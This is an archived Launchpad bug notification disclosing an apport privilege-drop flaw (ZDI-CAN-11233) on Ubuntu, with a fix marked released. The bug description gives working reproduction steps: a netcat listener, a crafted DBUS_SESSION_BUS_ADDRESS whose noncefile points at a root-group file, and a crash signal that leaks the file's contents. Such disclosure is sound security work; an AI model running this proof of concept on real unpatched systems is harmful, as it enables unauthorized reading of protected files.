← Back to team overview

group.of.nepali.translators team mailing list archive

[Bug 1885633] Re: [ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure Vulnerability

 

** Also affects: apport
   Importance: Undecided
       Status: New

** Changed in: apport
       Status: New => Fix Released

** Changed in: apport
    Milestone: None => 2.21.0

** Changed in: apport
   Importance: Undecided => Medium

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1885633

Title:
  [ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure
  Vulnerability

Status in Apport:
  Fix Released
Status in apport package in Ubuntu:
  Fix Released
Status in apport source package in Xenial:
  Fix Released
Status in apport source package in Bionic:
  Fix Released
Status in apport source package in Eoan:
  Won't Fix
Status in apport source package in Focal:
  Fix Released

Bug description:
  -- VULNERABILITY DETAILS ------------------------                                                                                                            
  * Version tested:18.04.4 LTS amd64 server                                                                                                                    
  * Installer file:ubuntu-18.04.4-live-server-amd64.iso                                                                                                        
  * Platform tested:-                                                                                                                                          
                                                                                                                                                               
  ---                                                                                                                                                          
                                                                                                                                                               
  ### Analysis                                                                                                                                                 
                                                                                                                                                               
  Apport which is crash reporter in Ubuntu will execute gdbus to check if pid is in a closing user session. Before executing the binary, it drop privilege to crashed process's uid. But it doesn't drop group id, so it can be used to leak file which is owned by root group.                                                                   
                                                                                                                                                               
  It leads to anyone can read the file which can only be read by root group, but the file size must be 16bytes. 

  reproduce step                                                                                                                                               
  ```                                                                                                                                                          
  ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile                                                                                                 
  ubuntu@ubuntu:/tmp$ sudo chown root:root securefile                                                                                                          
  ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile                                                                                                                
  ubuntu@ubuntu:/tmp$ su - zdi                                                                                                                                 
  Password:                                                                                                                                                    
  zdi@ubuntu:~$ id                                                                                                                                             
  uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)                                                                                                                 
  zdi@ubuntu:~$ cd /tmp/                                                                                                                                       
  zdi@ubuntu:/tmp$ ls -al securefile                                                                                                                           
  -r--r----- 1 root root 16 Jun 16 04:33 securefile                                                                                                            
  zdi@ubuntu:/tmp$ cat securefile                                                                                                                              
  cat: securefile: Permission denied                                                                                                                           
  zdi@ubuntu:/tmp$ nc -lp 8888 &                                                                                                                               
  [1] 2034                                                                                                                                                     
  zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &                              
  [2] 2036                                                                                                                                                     
  zdi@ubuntu:/tmp$ kill -11 2036                                                                                                                               
  zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH                                                                                                                        
                                                                                                                                                               
  zdi@ubuntu:/tmp$                                                                                                                                             
  ```                                                                                                                                                          
                                                                                                                                                               
  ~~~C++                                                                                                                                                       
      orig_uid = os.geteuid()                                                                                                                                  
      os.setresuid(-1, os.getuid(), -1)           <-- did not set gid                                                                                          
      try:                                                                                                                                                     
          gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',                                                                                      
                                    'org.gnome.SessionManager', '-o', '/org/gnome/SessionManager', '-m',                                                       
                                    'org.gnome.SessionManager.IsSessionRunning'], stdout=subprocess.PIPE,                                                      
                                   stderr=subprocess.PIPE, env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})                                                        
          (out, err) = gdbus.communicate()                                                                                                                     
          if err:                                                                                                                                              
              error_log('gdbus call error: ' + err.decode('UTF-8'))                                                                                            
      except OSError as e:                                                                                                                                     
          error_log('gdbus call failed, cannot determine running session: ' + str(e))                                                                          
          return False                                                                                                                                         
      finally:                                                                                                                                                 
          os.setresuid(-1, orig_uid, -1)                                                                                                                       
  ~~~
  -- CREDIT ---------------------------------------                                                                                                            
  This vulnerability was discovered by:                                                                                                                        
  Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative

To manage notifications about this bug go to:
https://bugs.launchpad.net/apport/+bug/1885633/+subscriptions